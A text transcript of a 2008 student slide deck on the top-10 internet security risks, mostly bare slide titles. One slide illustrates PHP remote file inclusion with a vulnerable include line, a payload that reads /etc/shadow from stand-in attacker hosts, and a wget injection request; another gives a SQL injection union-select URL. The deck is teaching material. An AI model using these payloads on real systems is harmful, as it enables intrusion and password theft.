Internet Security
-
Upload
2xyo -
Category
Technology
-
view
1.840 -
download
1
description
Transcript of Internet Security
![Page 1: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/1.jpg)
Yohann Lepage – Vincent Palierne
Top-10 2007 Security Risks
Wednesday 6th May 2008
INTERNET SECURITY
![Page 2: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/2.jpg)
Summary
![Page 3: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/3.jpg)
Client-side Vulnerabilities
ServerClient
Network(Internet)
Vulnerabilities
Softwares
![Page 4: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/4.jpg)
Web Browsers
![Page 5: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/5.jpg)
Email Clients
![Page 6: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/6.jpg)
Media Players
![Page 7: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/7.jpg)
Clients-Side Vulnerabilities
![Page 8: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/8.jpg)
Server-Side Vulnerabilities
ServerClient
Network(Internet)
Vulnerabilities
![Page 9: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/9.jpg)
Web Applications
Hacker www.mysite.com/index.php
<?php
include($page.'.php');
?>
Index.php
<?php passthru("cat /etc/shadow"); ?>
cat.php
www.badguy.ru/cat.php
$>wget www.mysite.com/index.php?page=www.haxor.com/cat Network
(Internet)
USER:PASSWORDroot:S5AçéZl~]Linus:@ée)&#$*^%Httpd:Jpzi5z@°
Www.mysite.com/indexindex.php
Vulnerabilities
![Page 10: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/10.jpg)
Database Software
http://localhost/admin.php?module=news&id= -1 union select 0,1,database(),3,4,5,6,7 from membres--
![Page 11: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/11.jpg)
Security Policy and Personal
![Page 12: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/12.jpg)
Phishing/Spear Phishing
![Page 13: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/13.jpg)
Application Abuse
![Page 14: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/14.jpg)
Instant Messaging
I MI M
![Page 15: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/15.jpg)
Peer-to-Peer Programs
![Page 16: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/16.jpg)
Zero Day Attacks
![Page 17: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/17.jpg)
Conclusion
Internet security is hard because :
![Page 18: Internet Security](https://reader036.fdocuments.in/reader036/viewer/2022081602/5551a78db4c905013a8b54c4/html5/thumbnails/18.jpg)
End